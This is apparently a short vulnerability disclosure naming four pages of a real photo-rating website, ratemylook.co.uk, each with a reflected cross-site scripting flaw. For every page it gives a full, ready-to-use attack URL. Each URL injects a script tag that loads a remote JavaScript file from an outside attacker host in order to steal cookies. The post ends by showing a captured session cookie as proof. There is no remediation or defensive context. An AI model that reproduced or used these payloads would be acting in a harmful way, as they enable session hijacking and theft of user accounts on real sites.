Ratemylook.co.uk

Homepage:
http://www.ratemylook.co.uk

Affected files:
user.php4
top.php4
hot.php4
toponline.php4
------------------------------------------------

user.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Screenshots:
http://www.youfucktard.com/xsp/ratemylook1.jpg
http://www.youfucktard.com/xsp/ratemylook2.jpg

--------------------------------------------------

top.php4 xss with cookie disclosure:

http://www.ratemylook.co.uk/top.php4?topshow=female&top=60&mode=top">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" 

Screenshots:
http://www.youfucktard.com/xsp/ratemylook3.jpg
http://www.youfucktard.com/xsp/ratemylook4.jpg

------------------------------------------------

hot.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/hot.php4?topshow=female&top=20&mode=hot">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

-------------------------------------------------

toponline.php4 XSSvulnwith cookie disclosure:

http://www.ratemylook.co.uk/toponline.php4?topshow=female&top=40&mode=online">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Our cookie:

This is remote text via xss.js located at youfucktard.com sid=fe0f38046fa4e406949c61c9650e923e; __utma=77460758.124649130.1150190458.1150190458.1150190458.1; __utmb=77460758; __utmc=77460758; __utmz=77460758.1150190458.1.1.utmccn=(referral)|utmcsr=allpictureratingsites.com|utmcct=/cgi-bin/jump2.cgi|utmcmd=referral